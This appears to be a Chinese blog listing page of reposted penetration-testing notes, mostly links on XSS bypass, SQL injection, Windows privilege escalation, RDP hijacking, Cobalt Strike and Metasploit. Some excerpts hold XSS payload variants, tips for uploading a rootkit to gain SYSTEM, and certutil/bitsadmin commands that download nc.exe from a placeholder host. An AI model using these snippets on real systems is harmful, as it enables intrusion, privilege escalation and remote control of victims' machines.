- 博客(17)
- 收藏
- 关注
转载 xss
<script\x20type="text/javascript">javascript:alert(1);</script><script\x3Etype="text/javascript">javascript:alert(2);</script><script\x0Dtype="text/javascript">javas...
2019-05-28 00:36:00
1894
转载 权限维持 -- 隐藏用户建立(Powershell)
https://evi1cg.me/archives/UserClone.html转载于:https://www.cnblogs.com/7bit/p/10577599.html
2019-03-22 13:04:00
275
转载 XSS bypass
https://blog.csdn.net/Fly_hps/article/details/84989317转载于:https://www.cnblogs.com/7bit/p/10533684.html
2019-03-14 21:37:00
146
转载 MySQL注入总结
https://www.waitalone.cn/mysql-injection-summary.html转载于:https://www.cnblogs.com/7bit/p/10533584.html
2019-03-14 21:22:00
74
转载 sqlmap --tamper 绕过WAF脚本分类整理
分类:https://blog.csdn.net/whatday/article/details/54774043详细介绍:https://blog.csdn.net/qq_34444097/article/details/82717357转载于:https://www.cnblogs.com/7bit/p/10527419.html...
2019-03-13 23:14:00
111
转载 WIN提权总结【本地存档-转载】
【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。...
2019-03-13 22:37:00
403
转载 域渗透的完整过程
https://www.cnblogs.com/mujj/articles/5807555.html转载于:https://www.cnblogs.com/7bit/p/10526909.html
2019-03-13 21:57:00
359
转载 Windows内网渗透提权的几个实用命令
https://www.freebuf.com/articles/system/114731.htmlwindows远程下载文件certutil -urlcache -split -fhttp://xxx.com/test.txt2.txtbitsadmin /transfer nhttp://www.xxx.com/nc.exec:\ma.exe转载于:https...
2019-03-11 16:36:00
109
转载 RDP劫持:如何透明劫持RDS以及RemoteApp会话
https://www.anquanke.com/post/id/101525转载于:https://www.cnblogs.com/7bit/p/10510677.html
2019-03-11 15:06:00
499
转载 渗透测试工具备忘单
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/转载于:https://www.cnblogs.com/7bit/p/10503929.html
2019-03-10 00:52:00
240
转载 Linux命令备忘单
https://highon.coffee/blog/linux-commands-cheat-sheet/转载于:https://www.cnblogs.com/7bit/p/10503928.html
2019-03-10 00:51:00
118
转载 Nmap备忘单
https://highon.coffee/blog/nmap-cheat-sheet/转载于:https://www.cnblogs.com/7bit/p/10503906.html
2019-03-10 00:42:00
63
转载 Cobalt Strike 服务器搭建及使用
Cobalt Strike使用中的一些坑(一)http://www.cnblogs.com/miaodaren/articles/7829793.htmlcobaltstrike3.8服务器搭建及使用https://www.cnblogs.com/ssooking/p/6017333.html转载于:https://www.cnblogs.com/7bit/p/10...
2019-03-10 00:24:00
4144
转载 Metasploit渗透测试实际应用
Metasploit:如何在 Metasploit 中使用反弹 Shellhttps://xz.aliyun.com/t/2380Metasploit:如何使用 msfvenomhttps://xz.aliyun.com/t/2381萌新科普 手把手教你如何用MSF进行后渗透测试https://www.anquanke.com/post/id/164525Meta...
2019-03-09 23:16:00
132
转载 fg和bg前后台调度命令
Linux下的fg和bg命令是进程的前后台调度命令,即将指定号码(非进程号)的命令进程放到前台或后台运行。比如一个需要长时间运行的命令,我们就希望把它放入后台,这样就不会阻塞当前的操作;而一些服务型的命令进程我们则希望能把它们长期运行于后台。进程前后台操作用到以下命令或按键:Ctrl+C终止并退出前台命令的执行,回到SHELLCtrl+Z暂停前台命令的执行,将该进程放...
2019-03-09 22:55:00
273
转载 Metasploit渗透测试梗概
1.渗透测试基础内容https://blog.csdn.net/Fly_hps/article/details/794926462.Metasploit基础https://blog.csdn.net/Fly_hps/article/details/794934873.情报收集https://blog.csdn.net/Fly_hps/article/details/7...
2019-03-09 22:04:00
124
转载 开通本处博客的意义
当个笔记本,有可能是链接,有可能是文章,一切从简转载于:https://www.cnblogs.com/7bit/p/10224115.html
2019-01-05 13:11:00
84
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人